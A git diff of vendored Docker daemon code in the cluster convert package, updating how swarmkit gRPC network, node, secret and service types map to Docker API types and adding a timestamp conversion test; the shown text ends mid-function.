a/vendor/github.com/docker/docker/daemon/cluster/convert/network.go b/vendor/github.com/docker/docker/daemon/cluster/convert/network.go index 4d21b4df0a..34660fc4ff 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/convert/network.go +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/network.go @@ -1,4 +1,4 @@ -package convert +package convert // import "github.com/docker/docker/daemon/cluster/convert" import ( "strings" @@ -6,11 +6,12 @@ import ( basictypes "github.com/docker/docker/api/types" networktypes "github.com/docker/docker/api/types/network" types "github.com/docker/docker/api/types/swarm" + netconst "github.com/docker/libnetwork/datastore" swarmapi "github.com/docker/swarmkit/api" - "github.com/docker/swarmkit/protobuf/ptypes" + gogotypes "github.com/gogo/protobuf/types" ) -func networkAttachementFromGRPC(na *swarmapi.NetworkAttachment) types.NetworkAttachment { +func networkAttachmentFromGRPC(na *swarmapi.NetworkAttachment) types.NetworkAttachment { if na != nil { return types.NetworkAttachment{ Network: networkFromGRPC(na.Network), @@ -28,19 +29,26 @@ func networkFromGRPC(n *swarmapi.Network) types.Network { IPv6Enabled: n.Spec.Ipv6Enabled, Internal: n.Spec.Internal, Attachable: n.Spec.Attachable, + Ingress: IsIngressNetwork(n), IPAMOptions: ipamFromGRPC(n.Spec.IPAM), + Scope: netconst.SwarmScope, }, IPAMOptions: ipamFromGRPC(n.IPAM), } + if n.Spec.GetNetwork() != "" { + network.Spec.ConfigFrom = &networktypes.ConfigReference{ + Network: n.Spec.GetNetwork(), + } + } + // Meta network.Version.Index = n.Meta.Version.Index - network.CreatedAt, _ = ptypes.Timestamp(n.Meta.CreatedAt) - network.UpdatedAt, _ = ptypes.Timestamp(n.Meta.UpdatedAt) + network.CreatedAt, _ = gogotypes.TimestampFromProto(n.Meta.CreatedAt) + network.UpdatedAt, _ = gogotypes.TimestampFromProto(n.Meta.UpdatedAt) //Annotations - network.Spec.Name = n.Spec.Annotations.Name - network.Spec.Labels = n.Spec.Annotations.Labels + network.Spec.Annotations = 
annotationsFromGRPC(n.Spec.Annotations) //DriverConfiguration if n.Spec.DriverConfig != nil { @@ -90,13 +98,7 @@ func endpointSpecFromGRPC(es *swarmapi.EndpointSpec) *types.EndpointSpec { endpointSpec.Mode = types.ResolutionMode(strings.ToLower(es.Mode.String())) for _, portState := range es.Ports { - endpointSpec.Ports = append(endpointSpec.Ports, types.PortConfig{ - Name: portState.Name, - Protocol: types.PortConfigProtocol(strings.ToLower(swarmapi.PortConfig_Protocol_name[int32(portState.Protocol)])), - PublishMode: types.PortConfigPublishMode(strings.ToLower(swarmapi.PortConfig_PublishMode_name[int32(portState.PublishMode)])), - TargetPort: portState.TargetPort, - PublishedPort: portState.PublishedPort, - }) + endpointSpec.Ports = append(endpointSpec.Ports, swarmPortConfigToAPIPortConfig(portState)) } } return endpointSpec @@ -110,13 +112,7 @@ func endpointFromGRPC(e *swarmapi.Endpoint) types.Endpoint { } for _, portState := range e.Ports { - endpoint.Ports = append(endpoint.Ports, types.PortConfig{ - Name: portState.Name, - Protocol: types.PortConfigProtocol(strings.ToLower(swarmapi.PortConfig_Protocol_name[int32(portState.Protocol)])), - PublishMode: types.PortConfigPublishMode(strings.ToLower(swarmapi.PortConfig_PublishMode_name[int32(portState.PublishMode)])), - TargetPort: portState.TargetPort, - PublishedPort: portState.PublishedPort, - }) + endpoint.Ports = append(endpoint.Ports, swarmPortConfigToAPIPortConfig(portState)) } for _, v := range e.VirtualIPs { @@ -130,17 +126,27 @@ func endpointFromGRPC(e *swarmapi.Endpoint) types.Endpoint { return endpoint } +func swarmPortConfigToAPIPortConfig(portConfig *swarmapi.PortConfig) types.PortConfig { + return types.PortConfig{ + Name: portConfig.Name, + Protocol: types.PortConfigProtocol(strings.ToLower(swarmapi.PortConfig_Protocol_name[int32(portConfig.Protocol)])), + PublishMode: types.PortConfigPublishMode(strings.ToLower(swarmapi.PortConfig_PublishMode_name[int32(portConfig.PublishMode)])), + TargetPort: 
portConfig.TargetPort, + PublishedPort: portConfig.PublishedPort, + } +} + // BasicNetworkFromGRPC converts a grpc Network to a NetworkResource. func BasicNetworkFromGRPC(n swarmapi.Network) basictypes.NetworkResource { spec := n.Spec var ipam networktypes.IPAM - if spec.IPAM != nil { - if spec.IPAM.Driver != nil { - ipam.Driver = spec.IPAM.Driver.Name - ipam.Options = spec.IPAM.Driver.Options + if n.IPAM != nil { + if n.IPAM.Driver != nil { + ipam.Driver = n.IPAM.Driver.Name + ipam.Options = n.IPAM.Driver.Options } - ipam.Config = make([]networktypes.IPAMConfig, 0, len(spec.IPAM.Configs)) - for _, ic := range spec.IPAM.Configs { + ipam.Config = make([]networktypes.IPAMConfig, 0, len(n.IPAM.Configs)) + for _, ic := range n.IPAM.Configs { ipamConfig := networktypes.IPAMConfig{ Subnet: ic.Subnet, IPRange: ic.Range, @@ -154,13 +160,21 @@ func BasicNetworkFromGRPC(n swarmapi.Network) basictypes.NetworkResource { nr := basictypes.NetworkResource{ ID: n.ID, Name: n.Spec.Annotations.Name, - Scope: "swarm", + Scope: netconst.SwarmScope, EnableIPv6: spec.Ipv6Enabled, IPAM: ipam, Internal: spec.Internal, Attachable: spec.Attachable, + Ingress: IsIngressNetwork(&n), Labels: n.Spec.Annotations.Labels, } + nr.Created, _ = gogotypes.TimestampFromProto(n.Meta.CreatedAt) + + if n.Spec.GetNetwork() != "" { + nr.ConfigFrom = networktypes.ConfigReference{ + Network: n.Spec.GetNetwork(), + } + } if n.DriverState != nil { nr.Driver = n.DriverState.Name @@ -184,6 +198,7 @@ func BasicNetworkCreateToGRPC(create basictypes.NetworkCreateRequest) swarmapi.N Ipv6Enabled: create.EnableIPv6, Internal: create.Internal, Attachable: create.Attachable, + Ingress: create.Ingress, } if create.IPAM != nil { driver := create.IPAM.Driver @@ -206,5 +221,20 @@ func BasicNetworkCreateToGRPC(create basictypes.NetworkCreateRequest) swarmapi.N } ns.IPAM.Configs = ipamSpec } + if create.ConfigFrom != nil { + ns.ConfigFrom = &swarmapi.NetworkSpec_Network{ + Network: create.ConfigFrom.Network, + } + } return ns 
} + +// IsIngressNetwork check if the swarm network is an ingress network +func IsIngressNetwork(n *swarmapi.Network) bool { + if n.Spec.Ingress { + return true + } + // Check if legacy defined ingress network + _, ok := n.Spec.Annotations.Labels["com.docker.swarm.internal"] + return ok && n.Spec.Annotations.Name == "ingress" +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/network_test.go b/vendor/github.com/docker/docker/daemon/cluster/convert/network_test.go new file mode 100644 index 0000000000..42f70696b7 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/network_test.go @@ -0,0 +1,34 @@ +package convert // import "github.com/docker/docker/daemon/cluster/convert" + +import ( + "testing" + "time" + + swarmapi "github.com/docker/swarmkit/api" + gogotypes "github.com/gogo/protobuf/types" +) + +func TestNetworkConvertBasicNetworkFromGRPCCreatedAt(t *testing.T) { + expected, err := time.Parse("Jan 2, 2006 at 3:04pm (MST)", "Jan 10, 2018 at 7:54pm (PST)") + if err != nil { + t.Fatal(err) + } + createdAt, err := gogotypes.TimestampProto(expected) + if err != nil { + t.Fatal(err) + } + + nw := swarmapi.Network{ + Meta: swarmapi.Meta{ + Version: swarmapi.Version{ + Index: 1, + }, + CreatedAt: createdAt, + }, + } + + n := BasicNetworkFromGRPC(nw) + if !n.Created.Equal(expected) { + t.Fatalf("expected time %s; received %s", expected, n.Created) + } +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/node.go b/vendor/github.com/docker/docker/daemon/cluster/convert/node.go index 306f34e0b2..00636b6ab4 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/convert/node.go +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/node.go @@ -1,4 +1,4 @@ -package convert +package convert // import "github.com/docker/docker/daemon/cluster/convert" import ( "fmt" @@ -6,7 +6,7 @@ import ( types "github.com/docker/docker/api/types/swarm" swarmapi "github.com/docker/swarmkit/api" - 
"github.com/docker/swarmkit/protobuf/ptypes" + gogotypes "github.com/gogo/protobuf/types" ) // NodeFromGRPC converts a grpc Node to a Node. @@ -14,7 +14,7 @@ func NodeFromGRPC(n swarmapi.Node) types.Node { node := types.Node{ ID: n.ID, Spec: types.NodeSpec{ - Role: types.NodeRole(strings.ToLower(n.Spec.Role.String())), + Role: types.NodeRole(strings.ToLower(n.Spec.DesiredRole.String())), Availability: types.NodeAvailability(strings.ToLower(n.Spec.Availability.String())), }, Status: types.NodeStatus{ @@ -26,12 +26,11 @@ func NodeFromGRPC(n swarmapi.Node) types.Node { // Meta node.Version.Index = n.Meta.Version.Index - node.CreatedAt, _ = ptypes.Timestamp(n.Meta.CreatedAt) - node.UpdatedAt, _ = ptypes.Timestamp(n.Meta.UpdatedAt) + node.CreatedAt, _ = gogotypes.TimestampFromProto(n.Meta.CreatedAt) + node.UpdatedAt, _ = gogotypes.TimestampFromProto(n.Meta.UpdatedAt) //Annotations - node.Spec.Name = n.Spec.Annotations.Name - node.Spec.Labels = n.Spec.Annotations.Labels + node.Spec.Annotations = annotationsFromGRPC(n.Spec.Annotations) //Description if n.Description != nil { @@ -43,6 +42,7 @@ func NodeFromGRPC(n swarmapi.Node) types.Node { if n.Description.Resources != nil { node.Description.Resources.NanoCPUs = n.Description.Resources.NanoCPUs node.Description.Resources.MemoryBytes = n.Description.Resources.MemoryBytes + node.Description.Resources.GenericResources = GenericResourcesFromGRPC(n.Description.Resources.Generic) } if n.Description.Engine != nil { node.Description.Engine.EngineVersion = n.Description.Engine.EngineVersion @@ -51,6 +51,11 @@ func NodeFromGRPC(n swarmapi.Node) types.Node { node.Description.Engine.Plugins = append(node.Description.Engine.Plugins, types.PluginDescription{Type: plugin.Type, Name: plugin.Name}) } } + if n.Description.TLSInfo != nil { + node.Description.TLSInfo.TrustRoot = string(n.Description.TLSInfo.TrustRoot) + node.Description.TLSInfo.CertIssuerPublicKey = n.Description.TLSInfo.CertIssuerPublicKey + 
node.Description.TLSInfo.CertIssuerSubject = n.Description.TLSInfo.CertIssuerSubject + } } //Manager @@ -74,7 +79,7 @@ func NodeSpecToGRPC(s types.NodeSpec) (swarmapi.NodeSpec, error) { }, } if role, ok := swarmapi.NodeRole_value[strings.ToUpper(string(s.Role))]; ok { - spec.Role = swarmapi.NodeRole(role) + spec.DesiredRole = swarmapi.NodeRole(role) } else { return swarmapi.NodeSpec{}, fmt.Errorf("invalid Role: %q", s.Role) } diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/secret.go b/vendor/github.com/docker/docker/daemon/cluster/convert/secret.go index 3e966873f4..d0e5ac45d2 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/convert/secret.go +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/secret.go @@ -1,9 +1,10 @@ -package convert +package convert // import "github.com/docker/docker/daemon/cluster/convert" import ( swarmtypes "github.com/docker/docker/api/types/swarm" + types "github.com/docker/docker/api/types/swarm" swarmapi "github.com/docker/swarmkit/api" - "github.com/docker/swarmkit/protobuf/ptypes" + gogotypes "github.com/gogo/protobuf/types" ) // SecretFromGRPC converts a grpc Secret to a Secret. 
@@ -11,31 +12,46 @@ func SecretFromGRPC(s *swarmapi.Secret) swarmtypes.Secret { secret := swarmtypes.Secret{ ID: s.ID, Spec: swarmtypes.SecretSpec{ - Annotations: swarmtypes.Annotations{ - Name: s.Spec.Annotations.Name, - Labels: s.Spec.Annotations.Labels, - }, - Data: s.Spec.Data, + Annotations: annotationsFromGRPC(s.Spec.Annotations), + Data: s.Spec.Data, + Driver: driverFromGRPC(s.Spec.Driver), }, } secret.Version.Index = s.Meta.Version.Index // Meta - secret.CreatedAt, _ = ptypes.Timestamp(s.Meta.CreatedAt) - secret.UpdatedAt, _ = ptypes.Timestamp(s.Meta.UpdatedAt) + secret.CreatedAt, _ = gogotypes.TimestampFromProto(s.Meta.CreatedAt) + secret.UpdatedAt, _ = gogotypes.TimestampFromProto(s.Meta.UpdatedAt) + + if s.Spec.Templating != nil { + secret.Spec.Templating = &types.Driver{ + Name: s.Spec.Templating.Name, + Options: s.Spec.Templating.Options, + } + } return secret } // SecretSpecToGRPC converts Secret to a grpc Secret. func SecretSpecToGRPC(s swarmtypes.SecretSpec) swarmapi.SecretSpec { - return swarmapi.SecretSpec{ + spec := swarmapi.SecretSpec{ Annotations: swarmapi.Annotations{ Name: s.Name, Labels: s.Labels, }, - Data: s.Data, + Data: s.Data, + Driver: driverToGRPC(s.Driver), } + + if s.Templating != nil { + spec.Templating = &swarmapi.Driver{ + Name: s.Templating.Name, + Options: s.Templating.Options, + } + } + + return spec } // SecretReferencesFromGRPC converts a slice of grpc SecretReference to SecretReference diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/service.go b/vendor/github.com/docker/docker/daemon/cluster/convert/service.go index aa68e01f44..5a1609aa01 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/convert/service.go +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/service.go @@ -1,33 +1,52 @@ -package convert +package convert // import "github.com/docker/docker/daemon/cluster/convert" import ( "fmt" "strings" types "github.com/docker/docker/api/types/swarm" + 
"github.com/docker/docker/api/types/swarm/runtime" "github.com/docker/docker/pkg/namesgenerator" swarmapi "github.com/docker/swarmkit/api" - "github.com/docker/swarmkit/protobuf/ptypes" + "github.com/docker/swarmkit/api/genericresource" + "github.com/gogo/protobuf/proto" + gogotypes "github.com/gogo/protobuf/types" + "github.com/pkg/errors" +) + +var ( + // ErrUnsupportedRuntime returns an error if the runtime is not supported by the daemon + ErrUnsupportedRuntime = errors.New("unsupported runtime") + // ErrMismatchedRuntime returns an error if the runtime does not match the provided spec + ErrMismatchedRuntime = errors.New("mismatched Runtime and *Spec fields") ) // ServiceFromGRPC converts a grpc Service to a Service. -func ServiceFromGRPC(s swarmapi.Service) types.Service { +func ServiceFromGRPC(s swarmapi.Service) (types.Service, error) { + curSpec, err := serviceSpecFromGRPC(&s.Spec) + if err != nil { + return types.Service{}, err + } + prevSpec, err := serviceSpecFromGRPC(s.PreviousSpec) + if err != nil { + return types.Service{}, err + } service := types.Service{ ID: s.ID, - Spec: *serviceSpecFromGRPC(&s.Spec), - PreviousSpec: serviceSpecFromGRPC(s.PreviousSpec), + Spec: *curSpec, + PreviousSpec: prevSpec, Endpoint: endpointFromGRPC(s.Endpoint), } // Meta service.Version.Index = s.Meta.Version.Index - service.CreatedAt, _ = ptypes.Timestamp(s.Meta.CreatedAt) - service.UpdatedAt, _ = ptypes.Timestamp(s.Meta.UpdatedAt) + service.CreatedAt, _ = gogotypes.TimestampFromProto(s.Meta.CreatedAt) + service.UpdatedAt, _ = gogotypes.TimestampFromProto(s.Meta.UpdatedAt) // UpdateStatus - service.UpdateStatus = types.UpdateStatus{} if s.UpdateStatus != nil { + service.UpdateStatus = &types.UpdateStatus{} switch s.UpdateStatus.State { case swarmapi.UpdateStatus_UPDATING: service.UpdateStatus.State = types.UpdateStateUpdating @@ -35,71 +54,74 @@ func ServiceFromGRPC(s swarmapi.Service) types.Service { service.UpdateStatus.State = types.UpdateStatePaused case 
swarmapi.UpdateStatus_COMPLETED: service.UpdateStatus.State = types.UpdateStateCompleted + case swarmapi.UpdateStatus_ROLLBACK_STARTED: + service.UpdateStatus.State = types.UpdateStateRollbackStarted + case swarmapi.UpdateStatus_ROLLBACK_PAUSED: + service.UpdateStatus.State = types.UpdateStateRollbackPaused + case swarmapi.UpdateStatus_ROLLBACK_COMPLETED: + service.UpdateStatus.State = types.UpdateStateRollbackCompleted + } + + startedAt, _ := gogotypes.TimestampFromProto(s.UpdateStatus.StartedAt) + if !startedAt.IsZero() && startedAt.Unix() != 0 { + service.UpdateStatus.StartedAt = &startedAt + } + + completedAt, _ := gogotypes.TimestampFromProto(s.UpdateStatus.CompletedAt) + if !completedAt.IsZero() && completedAt.Unix() != 0 { + service.UpdateStatus.CompletedAt = &completedAt } - service.UpdateStatus.StartedAt, _ = ptypes.Timestamp(s.UpdateStatus.StartedAt) - service.UpdateStatus.CompletedAt, _ = ptypes.Timestamp(s.UpdateStatus.CompletedAt) service.UpdateStatus.Message = s.UpdateStatus.Message } - return service + return service, nil } -func serviceSpecFromGRPC(spec *swarmapi.ServiceSpec) *types.ServiceSpec { +func serviceSpecFromGRPC(spec *swarmapi.ServiceSpec) (*types.ServiceSpec, error) { if spec == nil { - return nil + return nil, nil } serviceNetworks := make([]types.NetworkAttachmentConfig, 0, len(spec.Networks)) for _, n := range spec.Networks { - serviceNetworks = append(serviceNetworks, types.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases}) + netConfig := types.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases, DriverOpts: n.DriverAttachmentOpts} + serviceNetworks = append(serviceNetworks, netConfig) + } - taskNetworks := make([]types.NetworkAttachmentConfig, 0, len(spec.Task.Networks)) - for _, n := range spec.Task.Networks { - taskNetworks = append(taskNetworks, types.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases}) + taskTemplate, err := taskSpecFromGRPC(spec.Task) + if err != nil { + return nil, err } - 
containerConfig := spec.Task.Runtime.(*swarmapi.TaskSpec_Container).Container - convertedSpec := &types.ServiceSpec{ - Annotations: types.Annotations{ - Name: spec.Annotations.Name, - Labels: spec.Annotations.Labels, - }, + switch t := spec.Task.GetRuntime().(type) { + case *swarmapi.TaskSpec_Container: + containerConfig := t.Container + taskTemplate.ContainerSpec = containerSpecFromGRPC(containerConfig) + taskTemplate.Runtime = types.RuntimeContainer + case *swarmapi.TaskSpec_Generic: + switch t.Generic.Kind { + case string(types.RuntimePlugin): + taskTemplate.Runtime = types.RuntimePlugin + default: + return nil, fmt.Errorf("unknown task runtime type: %s", t.Generic.Payload.TypeUrl) + } - TaskTemplate: types.TaskSpec{ - ContainerSpec: containerSpecFromGRPC(containerConfig), - Resources: resourcesFromGRPC(spec.Task.Resources), - RestartPolicy: restartPolicyFromGRPC(spec.Task.Restart), - Placement: placementFromGRPC(spec.Task.Placement), - LogDriver: driverFromGRPC(spec.Task.LogDriver), - Networks: taskNetworks, - ForceUpdate: spec.Task.ForceUpdate, - }, + default: + return nil, fmt.Errorf("error creating service; unsupported runtime %T", t) + } + convertedSpec := &types.ServiceSpec{ + Annotations: annotationsFromGRPC(spec.Annotations), + TaskTemplate: taskTemplate, Networks: serviceNetworks, EndpointSpec: endpointSpecFromGRPC(spec.Endpoint), } // UpdateConfig - if spec.Update != nil { - convertedSpec.UpdateConfig = &types.UpdateConfig{ - Parallelism: spec.Update.Parallelism, - MaxFailureRatio: spec.Update.MaxFailureRatio, - } - - convertedSpec.UpdateConfig.Delay, _ = ptypes.Duration(&spec.Update.Delay) - if spec.Update.Monitor != nil { - convertedSpec.UpdateConfig.Monitor, _ = ptypes.Duration(spec.Update.Monitor) - } - - switch spec.Update.FailureAction { - case swarmapi.UpdateConfig_PAUSE: - convertedSpec.UpdateConfig.FailureAction = types.UpdateFailureActionPause - case swarmapi.UpdateConfig_CONTINUE: - convertedSpec.UpdateConfig.FailureAction = 
types.UpdateFailureActionContinue - } - } + convertedSpec.UpdateConfig = updateConfigFromGRPC(spec.Update) + convertedSpec.RollbackConfig = updateConfigFromGRPC(spec.Rollback) // Mode switch t := spec.GetMode().(type) { @@ -111,7 +133,7 @@ func serviceSpecFromGRPC(spec *swarmapi.ServiceSpec) *types.ServiceSpec { } } - return convertedSpec + return convertedSpec, nil } // ServiceSpecToGRPC converts a ServiceSpec to a grpc ServiceSpec. @@ -123,12 +145,15 @@ func ServiceSpecToGRPC(s types.ServiceSpec) (swarmapi.ServiceSpec, error) { serviceNetworks := make([]*swarmapi.NetworkAttachmentConfig, 0, len(s.Networks)) for _, n := range s.Networks { - serviceNetworks = append(serviceNetworks, &swarmapi.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases}) + netConfig := &swarmapi.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases, DriverAttachmentOpts: n.DriverOpts} + serviceNetworks = append(serviceNetworks, netConfig) } taskNetworks := make([]*swarmapi.NetworkAttachmentConfig, 0, len(s.TaskTemplate.Networks)) for _, n := range s.TaskTemplate.Networks { - taskNetworks = append(taskNetworks, &swarmapi.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases}) + netConfig := &swarmapi.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases, DriverAttachmentOpts: n.DriverOpts} + taskNetworks = append(taskNetworks, netConfig) + } spec := swarmapi.ServiceSpec{ @@ -145,11 +170,52 @@ func ServiceSpecToGRPC(s types.ServiceSpec) (swarmapi.ServiceSpec, error) { Networks: serviceNetworks, } - containerSpec, err := containerToGRPC(s.TaskTemplate.ContainerSpec) - if err != nil { - return swarmapi.ServiceSpec{}, err + switch s.TaskTemplate.Runtime { + case types.RuntimeContainer, "": // if empty runtime default to container + if s.TaskTemplate.ContainerSpec != nil { + containerSpec, err := containerToGRPC(s.TaskTemplate.ContainerSpec) + if err != nil { + return swarmapi.ServiceSpec{}, err + } + spec.Task.Runtime = &swarmapi.TaskSpec_Container{Container: 
containerSpec} + } else { + // If the ContainerSpec is nil, we can't set the task runtime + return swarmapi.ServiceSpec{}, ErrMismatchedRuntime + } + case types.RuntimePlugin: + if s.TaskTemplate.PluginSpec != nil { + if s.Mode.Replicated != nil { + return swarmapi.ServiceSpec{}, errors.New("plugins must not use replicated mode") + } + + s.Mode.Global = &types.GlobalService{} // must always be global + + pluginSpec, err := proto.Marshal(s.TaskTemplate.PluginSpec) + if err != nil { + return swarmapi.ServiceSpec{}, err + } + spec.Task.Runtime = &swarmapi.TaskSpec_Generic{ + Generic: &swarmapi.GenericRuntimeSpec{ + Kind: string(types.RuntimePlugin), + Payload: &gogotypes.Any{ + TypeUrl: string(types.RuntimeURLPlugin), + Value: pluginSpec, + }, + }, + } + } else { + return swarmapi.ServiceSpec{}, ErrMismatchedRuntime + } + case types.RuntimeNetworkAttachment: + // NOTE(dperny) I'm leaving this case here for completeness. The actual + // code is left out out deliberately, as we should refuse to parse a + // Network Attachment runtime; it will cause weird behavior all over + // the system if we do. Instead, fallthrough and return + // ErrUnsupportedRuntime if we get one. 
+ fallthrough + default: + return swarmapi.ServiceSpec{}, ErrUnsupportedRuntime } - spec.Task.Runtime = &swarmapi.TaskSpec_Container{Container: containerSpec} restartPolicy, err := restartPolicyToGRPC(s.TaskTemplate.RestartPolicy) if err != nil { @@ -158,30 +224,39 @@ func ServiceSpecToGRPC(s types.ServiceSpec) (swarmapi.ServiceSpec, error) { spec.Task.Restart = restartPolicy if s.TaskTemplate.Placement != nil { + var preferences []*swarmapi.PlacementPreference + for _, pref := range s.TaskTemplate.Placement.Preferences { + if pref.Spread != nil { + preferences = append(preferences, &swarmapi.PlacementPreference{ + Preference: &swarmapi.PlacementPreference_Spread{ + Spread: &swarmapi.SpreadOver{ + SpreadDescriptor: pref.Spread.SpreadDescriptor, + }, + }, + }) + } + } + var platforms []*swarmapi.Platform + for _, plat := range s.TaskTemplate.Placement.Platforms { + platforms = append(platforms, &swarmapi.Platform{ + Architecture: plat.Architecture, + OS: plat.OS, + }) + } spec.Task.Placement = &swarmapi.Placement{ Constraints: s.TaskTemplate.Placement.Constraints, + Preferences: preferences, + Platforms: platforms, } } - if s.UpdateConfig != nil { - var failureAction swarmapi.UpdateConfig_FailureAction - switch s.UpdateConfig.FailureAction { - case types.UpdateFailureActionPause, "": - failureAction = swarmapi.UpdateConfig_PAUSE - case types.UpdateFailureActionContinue: - failureAction = swarmapi.UpdateConfig_CONTINUE - default: - return swarmapi.ServiceSpec{}, fmt.Errorf("unrecongized update failure action %s", s.UpdateConfig.FailureAction) - } - spec.Update = &swarmapi.UpdateConfig{ - Parallelism: s.UpdateConfig.Parallelism, - Delay: *ptypes.DurationProto(s.UpdateConfig.Delay), - FailureAction: failureAction, - MaxFailureRatio: s.UpdateConfig.MaxFailureRatio, - } - if s.UpdateConfig.Monitor != 0 { - spec.Update.Monitor = ptypes.DurationProto(s.UpdateConfig.Monitor) - } + spec.Update, err = updateConfigToGRPC(s.UpdateConfig) + if err != nil { + return 
swarmapi.ServiceSpec{}, err + } + spec.Rollback, err = updateConfigToGRPC(s.RollbackConfig) + if err != nil { + return swarmapi.ServiceSpec{}, err } if s.EndpointSpec != nil { @@ -228,6 +303,44 @@ func ServiceSpecToGRPC(s types.ServiceSpec) (swarmapi.ServiceSpec, error) { return spec, nil } +func annotationsFromGRPC(ann swarmapi.Annotations) types.Annotations { + a := types.Annotations{ + Name: ann.Name, + Labels: ann.Labels, + } + + if a.Labels == nil { + a.Labels = make(map[string]string) + } + + return a +} + +// GenericResourcesFromGRPC converts a GRPC GenericResource to a GenericResource +func GenericResourcesFromGRPC(genericRes []*swarmapi.GenericResource) []types.GenericResource { + var generic []types.GenericResource + for _, res := range genericRes { + var current types.GenericResource + + switch r := res.Resource.(type) { + case *swarmapi.GenericResource_DiscreteResourceSpec: + current.DiscreteResourceSpec = &types.DiscreteGenericResource{ + Kind: r.DiscreteResourceSpec.Kind, + Value: r.DiscreteResourceSpec.Value, + } + case *swarmapi.GenericResource_NamedResourceSpec: + current.NamedResourceSpec = &types.NamedGenericResource{ + Kind: r.NamedResourceSpec.Kind, + Value: r.NamedResourceSpec.Value, + } + } + + generic = append(generic, current) + } + + return generic +} + func resourcesFromGRPC(res *swarmapi.ResourceRequirements) *types.ResourceRequirements { var resources *types.ResourceRequirements if res != nil { @@ -240,8 +353,9 @@ func resourcesFromGRPC(res *swarmapi.ResourceRequirements) *types.ResourceRequir } if res.Reservations != nil { resources.Reservations = &types.Resources{ - NanoCPUs: res.Reservations.NanoCPUs, - MemoryBytes: res.Reservations.MemoryBytes, + NanoCPUs: res.Reservations.NanoCPUs, + MemoryBytes: res.Reservations.MemoryBytes, + GenericResources: GenericResourcesFromGRPC(res.Reservations.Generic), } } } @@ -249,6 +363,24 @@ func resourcesFromGRPC(res *swarmapi.ResourceRequirements) *types.ResourceRequir return resources } +// 
GenericResourcesToGRPC converts a GenericResource to a GRPC GenericResource +func GenericResourcesToGRPC(genericRes []types.GenericResource) []*swarmapi.GenericResource { + var generic []*swarmapi.GenericResource + for _, res := range genericRes { + var r *swarmapi.GenericResource + + if res.DiscreteResourceSpec != nil { + r = genericresource.NewDiscrete(res.DiscreteResourceSpec.Kind, res.DiscreteResourceSpec.Value) + } else if res.NamedResourceSpec != nil { + r = genericresource.NewString(res.NamedResourceSpec.Kind, res.NamedResourceSpec.Value) + } + + generic = append(generic, r) + } + + return generic +} + func resourcesToGRPC(res *types.ResourceRequirements) *swarmapi.ResourceRequirements { var reqs *swarmapi.ResourceRequirements if res != nil { @@ -263,6 +395,7 @@ func resourcesToGRPC(res *types.ResourceRequirements) *swarmapi.ResourceRequirem reqs.Reservations = &swarmapi.Resources{ NanoCPUs: res.Reservations.NanoCPUs, MemoryBytes: res.Reservations.MemoryBytes, + Generic: GenericResourcesToGRPC(res.Reservations.GenericResources), } } @@ -287,11 +420,11 @@ func restartPolicyFromGRPC(p *swarmapi.RestartPolicy) *types.RestartPolicy { } if p.Delay != nil { - delay, _ := ptypes.Duration(p.Delay) + delay, _ := gogotypes.DurationFromProto(p.Delay) rp.Delay = &delay } if p.Window != nil { - window, _ := ptypes.Duration(p.Window) + window, _ := gogotypes.DurationFromProto(p.Window) rp.Window = &window } @@ -320,10 +453,10 @@ func restartPolicyToGRPC(p *types.RestartPolicy) (*swarmapi.RestartPolicy, error } if p.Delay != nil { - rp.Delay = ptypes.DurationProto(*p.Delay) + rp.Delay = gogotypes.DurationProto(*p.Delay) } if p.Window != nil { - rp.Window = ptypes.DurationProto(*p.Window) + rp.Window = gogotypes.DurationProto(*p.Window) } if p.MaxAttempts != nil { rp.MaxAttempts = *p.MaxAttempts @@ -334,10 +467,28 @@ func restartPolicyToGRPC(p *types.RestartPolicy) (*swarmapi.RestartPolicy, error } func placementFromGRPC(p *swarmapi.Placement) *types.Placement { - var r 
*types.Placement - if p != nil { - r = &types.Placement{} - r.Constraints = p.Constraints + if p == nil { + return nil + } + r := &types.Placement{ + Constraints: p.Constraints, + } + + for _, pref := range p.Preferences { + if spread := pref.GetSpread(); spread != nil { + r.Preferences = append(r.Preferences, types.PlacementPreference{ + Spread: &types.SpreadOver{ + SpreadDescriptor: spread.SpreadDescriptor, + }, + }) + } + } + + for _, plat := range p.Platforms { + r.Platforms = append(r.Platforms, types.Platform{ + Architecture: plat.Architecture, + OS: plat.OS, + }) } return r @@ -364,3 +515,125 @@ func driverToGRPC(p *types.Driver) *swarmapi.Driver { Options: p.Options, } } + +func updateConfigFromGRPC(updateConfig *swarmapi.UpdateConfig) *types.UpdateConfig { + if updateConfig == nil { + return nil + } + + converted := &types.UpdateConfig{ + Parallelism: updateConfig.Parallelism, + MaxFailureRatio: updateConfig.MaxFailureRatio, + } + + converted.Delay = updateConfig.Delay + if updateConfig.Monitor != nil { + converted.Monitor, _ = gogotypes.DurationFromProto(updateConfig.Monitor) + } + + switch updateConfig.FailureAction { + case swarmapi.UpdateConfig_PAUSE: + converted.FailureAction = types.UpdateFailureActionPause + case swarmapi.UpdateConfig_CONTINUE: + converted.FailureAction = types.UpdateFailureActionContinue + case swarmapi.UpdateConfig_ROLLBACK: + converted.FailureAction = types.UpdateFailureActionRollback + } + + switch updateConfig.Order { + case swarmapi.UpdateConfig_STOP_FIRST: + converted.Order = types.UpdateOrderStopFirst + case swarmapi.UpdateConfig_START_FIRST: + converted.Order = types.UpdateOrderStartFirst + } + + return converted +} + +func updateConfigToGRPC(updateConfig *types.UpdateConfig) (*swarmapi.UpdateConfig, error) { + if updateConfig == nil { + return nil, nil + } + + converted := &swarmapi.UpdateConfig{ + Parallelism: updateConfig.Parallelism, + Delay: updateConfig.Delay, 